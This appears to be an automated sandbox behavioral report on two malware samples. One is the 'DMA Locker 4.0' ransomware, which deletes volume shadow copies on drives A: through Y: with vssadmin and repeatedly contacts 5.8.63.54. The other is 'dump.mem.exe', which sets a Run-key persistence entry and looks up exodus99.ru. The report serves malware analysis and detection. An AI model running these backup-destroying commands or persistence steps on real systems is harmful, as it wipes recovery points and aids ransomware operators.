PID 1892 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 2716 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2716 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2716 wrote to memory of 2856 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2444 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 2444 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2444 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2444 wrote to memory of 2496 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2924 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 2924 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2924 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2924 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1916 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1916 wrote to memory of 608 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1916 wrote to memory of 608 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1916 wrote to memory of 608 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1236 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1236 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1236 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 2744 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2744 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 2744 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1892 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe
PID 1716 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1716 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1716 wrote to memory of 1020 N/A C:\Windows\system32\cmd.exe C:\WINDOWS\system32\vssadmin.exe
PID 1892 wrote to memory of 1304 N/A C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe C:\Windows\system32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe

"C:\Users\Admin\AppData\Local\Temp\dma locker 4.0.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=A: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=A: /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=B: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=B: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=C: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=C: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=D: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=D: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=E: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=E: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=F: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=F: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=G: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=G: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=H: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=H: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=I: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=I: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=J: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=J: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=K: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=K: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=L: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=L: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=M: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=M: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=N: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=N: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=O: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=O: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=P: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=P: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Q: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Q: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=R: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=R: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=S: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=S: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=T: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=T: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=U: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=U: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=V: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=V: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=W: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=W: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=X: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=X: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Y: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Y: /all /quiet

C:\ProgramData\svchosd.exe

"C:\ProgramData\svchosd.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=A: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=A: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=B: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=B: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=C: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=C: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=D: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=D: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=E: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=E: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=F: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=F: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=G: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=G: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=H: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=H: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=I: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=I: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=J: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=J: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=K: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=K: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=L: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=L: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=M: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=M: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=N: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=N: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=O: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=O: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=P: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=P: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Q: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Q: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=R: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=R: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=S: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=S: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=T: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=T: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=U: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=U: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=V: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=V: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=W: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=W: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=X: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=X: /all /quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Y: /all /quiet

C:\WINDOWS\system32\vssadmin.exe

C:\WINDOWS\system32\vssadmin.exe delete shadows /For=Y: /all /quiet

Network

Country Destination Domain Proto
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp
US 5.8.63.54:80 tcp

Files

memory/1892-0-0x0000000000350000-0x0000000000391000-memory.dmp

memory/1892-1-0x0000000000400000-0x0000000000453000-memory.dmp

memory/1892-2-0x0000000000350000-0x0000000000391000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20240903-en

Max time kernel

567s

Max time network

568s

Command Line

"C:\Users\Admin\AppData\Local\Temp\dump.mem.exe"

Signatures

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Local\\service.exe" C:\Users\Admin\AppData\Local\Temp\dump.mem.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\dump.mem.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\dump.mem.exe

"C:\Users\Admin\AppData\Local\Temp\dump.mem.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 exodus99.ru udp

Files

N/A